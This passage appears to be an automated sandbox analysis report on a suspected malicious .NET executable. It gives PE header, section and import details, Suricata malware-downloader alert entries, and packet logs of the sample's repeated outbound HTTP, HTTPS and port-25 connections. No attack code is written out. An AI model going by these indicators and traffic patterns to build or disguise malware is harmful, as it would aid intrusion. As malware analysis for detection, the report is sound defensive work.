                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al
                                                                                    add byte ptr [eax], al

                                                                                    Data Directories

                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x442d40x57.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x1017.rsrc
                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x480000xc.reloc
                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                    Sections

                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                    .text0x20000x423340x42400919e43dbe19599951b7418f92397e789False0.2138892983490566data5.632473442443166IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                    .rsrc0x460000x10170x120078b97a769c57cf460625c961b04b1a16False0.3543836805555556data4.76801789588623IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                    .reloc0x480000xc0x2003357292ff3dc4e25505da1bb6c6902f0False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                    Resources

                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                    RT_VERSION0x460a00x31cdata0.4271356783919598
                                                                                    RT_MANIFEST0x463bc0xc5bXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.3926651912741069

                                                                                    Imports

                                                                                    DLLImport
                                                                                    mscoree.dll_CorExeMain

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-07T15:32:10.619499+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699158.101.44.24280TCP
                                                                                    2024-10-07T15:32:11.463421+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749699158.101.44.24280TCP
                                                                                    2024-10-07T15:32:12.024708+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749701188.114.97.3443TCP
                                                                                    2024-10-07T15:32:12.635105+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749702158.101.44.24280TCP
                                                                                    2024-10-07T15:32:13.791372+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749704158.101.44.24280TCP
                                                                                    2024-10-07T15:32:14.947634+02002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749706158.101.44.24280TCP
                                                                                    2024-10-07T15:32:15.878264+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749707188.114.97.3443TCP
                                                                                    2024-10-07T15:32:17.084831+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749709188.114.97.3443TCP
                                                                                    2024-10-07T15:32:18.238750+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749711188.114.97.3443TCP
                                                                                    2024-10-07T15:32:19.662001+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.749713188.114.97.3443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 7, 2024 15:32:08.776802063 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:08.781671047 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:08.781765938 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:08.782037973 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:08.786951065 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.419218063 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.419576883 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.419810057 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.419852018 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:10.419852018 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:10.420491934 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.420532942 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:10.423350096 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:10.428246021 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.573785067 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.619436979 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:10.619488955 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.619498968 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:10.619549990 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:10.627645969 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:10.627657890 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.082218885 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.082315922 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.087321997 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.087333918 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.087641954 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.135417938 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.141650915 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.187402964 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.246562958 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.246803999 CEST44349700188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.246869087 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.252212048 CEST49700443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.255348921 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:11.260171890 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.417453051 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.420046091 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.420084000 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.420161009 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.420392990 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.420402050 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.463421106 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:11.866590977 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:11.868824005 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:11.868854046 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.024559021 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.024646997 CEST44349701188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.024694920 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:12.025141001 CEST49701443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:12.029836893 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:12.031086922 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:12.035223961 CEST8049699158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.035294056 CEST4969980192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:12.036786079 CEST8049702158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.036848068 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:12.036933899 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:12.041737080 CEST8049702158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.585233927 CEST8049702158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.586659908 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:12.586703062 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.586790085 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:12.587099075 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:12.587114096 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:12.635104895 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.047451973 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.049753904 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.049803972 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.178781986 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.179016113 CEST44349703188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.179097891 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.179620981 CEST49703443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.183911085 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.185630083 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.189121008 CEST8049702158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.189197063 CEST4970280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.190442085 CEST8049704158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.190542936 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.190700054 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:13.195458889 CEST8049704158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.739020109 CEST8049704158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.740792036 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.740834951 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.741013050 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.741296053 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:13.741316080 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:13.791372061 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.191041946 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.192961931 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.192996979 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.325818062 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.326076031 CEST44349705188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.326128006 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.326581001 CEST49705443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.329606056 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.330506086 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.336381912 CEST8049706158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.336466074 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.336594105 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.336987019 CEST8049704158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.337212086 CEST4970480192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:14.342717886 CEST8049706158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.895538092 CEST8049706158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.897156954 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.897217989 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.897296906 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.901082039 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:14.901118994 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:14.947633982 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:15.364062071 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:15.365806103 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:15.365828037 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:15.878349066 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:15.878590107 CEST44349707188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:15.878648043 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:15.879211903 CEST49707443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:15.897013903 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:15.902157068 CEST8049708158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:15.902247906 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:15.903928041 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:15.908772945 CEST8049708158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:16.472619057 CEST8049708158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:16.485485077 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:16.485543013 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:16.485733986 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:16.485965967 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:16.485986948 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:16.525775909 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:16.938893080 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:16.940721035 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:16.940809965 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.084922075 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.085138083 CEST44349709188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.085191011 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.085587978 CEST49709443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.089426994 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.090563059 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.094785929 CEST8049708158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.094918013 CEST4970880192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.095470905 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.095524073 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.095774889 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:17.100573063 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.632886887 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.633948088 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.633977890 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.634037971 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.634282112 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:17.634289026 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:17.681993961 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.106833935 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.108937979 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.108958960 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238713026 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238805056 CEST44349711188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.238873959 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.239360094 CEST49711443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:18.242965937 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.244038105 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.248245955 CEST8049710158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.248305082 CEST4971080192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.248893976 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:18.248966932 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.249037027 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:18.254184008 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.017308950 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.018198013 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.018261909 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.020211935 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020257950 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.020337105 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020551920 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.020566940 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.512697935 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.514173031 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.514195919 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662012100 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662122965 CEST44349713188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.662198067 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.662635088 CEST49713443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:19.665285110 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.666277885 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.670768023 CEST8049712158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.670835972 CEST4971280192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.671494961 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:19.671560049 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.671669960 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:19.676603079 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.217713118 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.218930006 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.218969107 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.219041109 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.219394922 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:20.219405890 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:20.260134935 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.671840906 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.680212975 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.680227995 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819034100 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819124937 CEST44349716188.114.97.3192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.819209099 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.825172901 CEST49716443192.168.2.7188.114.97.3
                                                                                    Oct 7, 2024 15:32:21.918596029 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.924390078 CEST8049715158.101.44.242192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.924443007 CEST4971580192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:21.931436062 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.931473017 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.931534052 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.934407949 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:21.934422016 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.891280890 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.891357899 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.892986059 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.892991066 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.893220901 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:22.894597054 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:22.939413071 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.131922007 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.131982088 CEST44349722149.154.167.220192.168.2.7
                                                                                    Oct 7, 2024 15:32:23.132059097 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:23.136456013 CEST49722443192.168.2.7149.154.167.220
                                                                                    Oct 7, 2024 15:32:28.311276913 CEST4970680192.168.2.7158.101.44.242
                                                                                    Oct 7, 2024 15:32:28.586433887 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:29.572762012 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:31.573045015 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:35.572705030 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:43.572726011 CEST4977025192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:51.091054916 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:52.104017019 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:54.104020119 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:32:58.104027987 CEST4990325192.168.2.7192.250.231.25
                                                                                    Oct 7, 2024 15:33:06.104062080 CEST4990325192.168.2.7192.250.231.25

                                                                                    UDP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 7, 2024 15:32:08.759109020 CEST5017853192.168.2.71.1.1.1
                                                                                    Oct 7, 2024 15:32:08.766763926 CEST53501781.1.1.1192.168.2.7
                                                                                    Oct 7, 2024 15:32:10.608319998 CEST5428653192.168.2.71.1.1.1
                                                                                    Oct 7, 2024 15:32:10.618717909 CEST53542861.1.1.1192.168.2.7
                                                                                    Oct 7, 2024 15:32:21.918437004 CEST6360653192.168.2.71.1.1.1
                                                                                    Oct 7, 2024 15:32:21.925395012 CEST53636061.1.1.1192.168.2.7
                                                                                    Oct 7, 2024 15:32:28.489160061 CEST6535353192.168.2.71.1.1.1
